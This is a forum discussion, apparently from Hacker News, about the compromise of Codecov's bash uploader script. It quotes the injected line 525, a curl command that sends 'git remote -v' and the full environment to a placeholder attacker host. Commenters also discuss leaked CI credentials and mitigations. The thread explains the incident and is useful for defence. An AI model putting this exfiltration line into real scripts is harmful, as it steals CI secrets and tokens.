[davidrans]

From Eli Hooten, CodeCov's CTO, in a personal message:

> Based on the nature of this attack I do not believe malicious actions were executed directly against the CI pipeline, nor do we have any evidence of it. I have included the malicious bash script for your review so you can fully understand the scope of the attack. Of interest is line 525

> line 525 was the only change we've observed. I have removed the IP address in the curl command as it is part of an ongoing federal investigation

Compromised script: https://gist.github.com/davidrans/ca6e9ffa5865983d9f6aa00b7a...

And here's line 525:

  curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://ATTACKERIP/upload/v2 || true

[YPCrumble]

So the hackers stole every environment variable for the context in which the Codecov script was run.

It means that if you use CI to deploy your code, all of your credentials have been leaked.

[goerz]

Why doesn’t GitHub Actions limit the environment variables it exposes to jobs/steps? The codecov step doesn’t need my GitHub or PyPI tokens! Environment variables should be opt-in for every step in the pipeline: I should have to explicitly list every environment variable I want to expose. This leak is as much on GitHub as it is on Codecov

[mhils]

GitHub actually introduced "Environments" recently, which allow you to do what you are asking for. Lots of existing pipelines haven't migrated yet of course.

https://docs.github.com/en/actions/reference/environments

[goerz]

Nice!

[fishnchips]

GitHub Actions actually requires you to explicitly pass secrets to individual steps. If you're using GitHub Actions, what got leaked was the commit metadata, and the codecov token itself. Unless you manually passed the entire environment to the codecov step, that is.

[rdsubhas]

Most CI sytems have Github Token as an environment variable. That provides a second layer of attack.

Attacker by this time could have cloned all repositories, so whatever config, credentials, service account files or anything inside these repos are also assumed to be compromised. Not just environment variables.